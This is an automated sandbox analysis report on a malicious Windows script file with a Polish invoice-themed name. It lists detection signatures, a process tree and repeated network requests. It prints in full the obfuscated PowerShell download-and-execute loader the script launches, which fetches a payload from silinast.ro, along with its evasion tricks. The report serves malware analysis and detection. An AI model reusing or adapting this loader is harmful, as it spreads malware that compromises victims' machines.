Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Wniosek o numer faktury.wsf

Overview

General Information

Sample name:Wniosek o numer faktury.wsf
Analysis ID:1528870
MD5:b3a1adc2eab232bddfe5149b896af1c8
SHA1:be84a3bb6abe9b87cd90af27ca5574dae9607d48
SHA256:55d2f245a0b7975884b7e5bbf284bcb72cc1514a726eb6988a1ca1e1e429cfb4
Tags:wsfuser-Maciej8910871
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5500 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6468 cmdline: cmd.exe /c ping 6777.6777.6777.677e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3180 cmdline: ping 6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
    • powershell.exe (PID: 1336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'Contral[ SandblnYawl nkEXiphipltAartier. ,erpenS Fla.gieVictorir StatsvvPo ygeniS philiCBlaffe eModulvip ensdyrO bil igiBlokadeNCholecyTLovprisMHjhletfAFibroelNN edlemaLongbowgHv,skedEJamborerTrktjet]philomu:Elforsy:b,ckbussBraiserEGlyconeCSkeletouSingul.RNationaIjedd,hitCommin.yHu tankpSwoosheRHydro,lo TidtagtNonshatOfr dmmeC Jor,broHaleweelUdsprin Boldtre=Pteropu Strejf[Ve.nacuNMizenmaeTranquiT Anostr.Rationas D.shalE nowbloCFlus erUFluktueRUsheriaITekstilTEpi idyyShedmanPJydepotr But,ksOH.lotriTAg rnsuOLivskracSpilledois andsLGenetabTUntwitcYcrestsrPHoodshyELredren] gldssa:homemak:Form ddT Bra,etLMellemfs Abdomi1Uncoaxe2 Superf ');$Maalestationernes=$Upsettal[0];$eupnoeic=(Citationstegnet 'Po tula$ Spermag ,alataLSlvstolOIntell.b W,nderaChefk nLWrangle:VildtdidFluviale demi aAPotholer VedersYFluor s2 Lovreg3Sprogkl3Rayonna=undervinslambeheNectriaW Subung- PeroliO WoolieBLgnehisJGarapateUna brec uggenttT ermot HymenopsOppo itY A.minisS.rivelt eemanaEDe ennimPatriar.War letnTabelleErivettitF,rstan.Listep WVinderteOverstiBDri,tsiC SponsoLColaensI S.cialE Rec ifNafvikliTUdydsva ');Humiria ($eupnoeic);Humiria (Citationstegnet 'Gulliut$u graveDMidshipe ste peaSourtoprs,pramayLeverin2Dehydra3Adjuvat3 Sa men.Gr ynesHRichn.seSejpinea,ranchedSubmerge Rets.rrSekundasGopural[Slyng i$andenklAHypapoppDagsprirAa enhjiCounterlSafthols lapsenter,itoaRtehalmrbagefors pardie1Gungrem9Fe mate0Sl bnin]p.theca= Stepd.$Guas.alUPalewi d Abb.evf SelvhelSacrifia.pectrudTele henSpectroiHom,nymnSappa wgHurriexeAntimonrPoachernseasonaeOverr s1Perspekv harteryBlo rigb Retroce Foliarr TambalrDelkredyBilledf ');$Venskabsbyen=Citationstegnet 'Un.erkb$ .hylloD Morbi eShrewisa Fortolr eitonoy nderpa2Fructuo3 Marche3Ectopla. RosewoDEksilero Ngleomw Nonradn CountelFabrikaoOveroffaSulphiddIrmamrkF anensciDr ntfolFredrikebogklub(Sammens$LarrikiMDosmerna Sundh,aVan.lbslSanselie Sele.tsDobbelttVigint avagrantt H.rejuiConvivioInddmconUnmembee Ma dskr blytkkn Popul.eValewarsHo.shan,Trykblg$EfterviRBararmeuSkaf,esbForfl,di DemonoaDemountc FuturoeblndramaChronise Rednin) Egensk ';$Rubiaceae=$administrationsprogrammer;Humiria (Citationstegnet 'Ev ngel$ Ta,ellgSnitselLDiscandoEkstre.BStin svaSplenolLMedh.lp:P oletaoShahe,sFKipkalvfPolygamICensurkCotiticei ServieaUnderudlKbslaaaVMunsifciOverlubR LeachekSubsistsMesonepOBla dinMSubramohE.aarigEFuglehaDBronchoE Eksperr Social4 Roligt4 Overtr=Horaten(Kat,batTFoxtrotE QuisquS NominatD sbenc-VarselsP BetingA Fore.dtComitatHParthen egelis$TrstubbRSpeedomuSelenosBDesig.fiRedemptA Appetic Trans eGodsterAPillorieVejenkl)Kvgbrug ');while (!$Officialvirksomheder44) {Humiria (Citationstegnet ' Opretn$Expand.gBoozinelK ivkamoMinim.rbOtocystapleasaulAdviser:Mo omolC UdgiftoGobblinlSkibsr,lDioicouy evggrub pleopoadigono =Tilsp.r$Pyoi betcofi.anr Kategou antiscePhospho ') ;Humiria $Venskabsbyen;Humiria (Citationstegnet 'S,lowviSChristiTTransisaRehoninr,valiteTFintede-Unikae s,latycnLVert biE,acrameeQuinovopClinoph Domajig4Calatra ');Humiria (Citationstegnet ' Bilbre$ atsdekgAegteskl SlagteOSocio oBS,lerodAVulgariLWorkbas:snowshaO ndiscFCatchplf Str foI Kryst cDicotylIModarb aDenouncLheraldrvSacketcI S outerAnticorkLag rbeSTeasellOLmmelstmPre,onshcircumseUn ulatdpolemoseSu ernirIndlagt4Tonnens4Beruser=Synsv d(ZarerviTBesl tnESmilerhSunst inT skrift-Falshvlp sldrevaHengivetBlokbebh Isohes Raekker$Mu ticyrOverv,ruT,lentfb aniskeiSedimenAFodl ngcBino,iaEOverrelasavoroueKri.sra)Non pos ') ;Humiria (Citationstegnet 'Indremi$BitestiG InspirLTumidito TrbeskbGenyantaF rbrydLBerring:Bet gensPenta eCIvrkstthEksportO onsillo utpresLMark nghHyperviOUninterUDe,ainaskancelleKlag adSCiril o=D meskr$ nruddgUn,ordyLMudde,pOGottharBHospitaAInkorpoL Deta h:underdeo a ribrrUnappreihustankSSstridspRagoutehHaartopEEntreprRUn.ougheRepelli+Ceylone+Fednmag%Ydmyg.d$DiapnotULov stePUn selisSammensEcum,noiTFluidist TroposAAl,mnollMouseba. T lhoec IndsyoO SlidsoUTrivia NSpacecrTindvend ') ;$Maalestationernes=$Upsettal[$schoolhouses];}$Effektfuld=311542;$Garnnglers=33970;Humiria (Citationstegnet 'Flad.ng$ almebgGUdkoblelPintaskO BrobygBOpvejeraUncon.ilU level:Fa ulteETndrrsnm Sabba bUdenrigRkyllin OEndocriSMagi.trc VidereOHombretPweed inI SurfedCPa ynol Folk re= En.old FasanhnGThal aneNy ansktVelkoms-SkenderCInrusheo jertesN KontorTButi keeNo ditanChungviTOmstnin Udrug $TestamerTonikaeUBackarrBSkribleiKlemat aUbekrftCRandomiECoinquiaA ylemiePerspek ');Humiria (Citationstegnet '.mmodyt$RealitegBlackgulheteroco Rkvrkeb BropenaStngelelNucleat:tapaderSSocialleOlfactymSej brtiUnhonesnRubbereiashilymsYalelaatR books2Clodpol4cantr p3racehes Dogmat=Pilpais Dagafsn[CurricuSRubblinyCranke swired,atNonlique forgivmunridab.ExquisiCC shkluo BalletnSynta svAnegalle oupetfrBrisjabtReh efo]Life,ty: Andrag:UnsearcFAgurksprDueske o Ci clemSquamygBGipsdepaEuropaksO fwhiteS,upnef6Kimissv4indkbsaS nplankt proaccrSagnfigiNic namnCel ermgTim lia(Inexora$panningEPa elunmP stinsbDronninrFortidsoGraphics Percenc Soci loPreindupKur,udviMyndighcGossame)Forvist ');Humiria (Citationstegnet 'Foldout$SparepegAlkylolLSenilisoBippeneBDumpnina LaparoLSide il:LangvarL usstano Pe minO Adoni.KLeukoseDSkrte uoSjlevanWIlfrdignGamblessUntissu Harpun =Wickyfo Debyein[ Re nfrsKlagdocyKommuneS DesserT angsveeEquilinmP ulina.RugbyenTPapirdoe BrugerXTilrettt S yros.Begyn.eePredissnTachomeC onstorORodetcodDipoleri MdeaftnRungendgAchokes] Jordvo:uvurder: Nonat ABill.dhsDiluviuCHyponomiTomasteIOreocar.genforeGPeritoneEbelt,ftTrehedesVenligstVi tigtR BanabaILisabetNtehuecoGNonstat(omstill$ AntigeS DuridiEVertikaMHageskgIPropinqn O helcIIskagemS Hexad tUn slaa2 okalp4Forthse3u adjus)Looking ');Humiria (Citationstegnet 'Phototy$CatchphG VidtlfLMeddelso TintinbDacapona BefrieLKanjist:TmrermeNFrangibO BettonN askinfCHygiejna SlabbenNonreseDReallnnIHjssoneDRekapitaStude rT tearinEUdgivelSForhand=Knnessk$ EkkololPostninO anim loFibrillKCepforsdElianasO destitWComminuNhobbyi S Inju i.FlakonesEkstr.oUApothecbDevalueSPara idTNicolaiRDr,vtmmiUdligniNDivertiGRecoils( hasian$Ni htimE,yromanf ammenkfToraerseMyer,orK BenzintRefuserf artoonuHorsecrLRitteniD Obispo,Udenla $ HyrekrgGedesk,ADaaredertankangnDanielun PejoraG SkatteLSwe.tieeHyaluror RdkaalS ortari)Unhaggl ');Humiria $Noncandidates;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 1336JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_1336.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf", ProcessId: 5500, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'Contral[ SandblnYawl nkEXiphipltAartier. ,erpenS Fla.gieVi

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for domain / URL
      Source: silinast.roVirustotal: Detection: 10%Perma Link
      Source: http://silinast.roVirustotal: Detection: 10%Perma Link
      Multi AV Scanner detection for submitted file
      Source: Wniosek o numer faktury.wsfReversingLabs: Detection: 23%
      Source: Wniosek o numer faktury.wsfVirustotal: Detection: 19%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
      Source: Binary string: ystem.pdb source: powershell.exe, 00000005.00000002.4643691298.0000015DED898000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA73000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000005.00000002.4643691298.0000015DED898000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb95f source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.4646772637.0000015DEFAAB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb!1 source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA40000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Networking

      barindex
      Uses ping.exe to check the status of other devices and networks
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
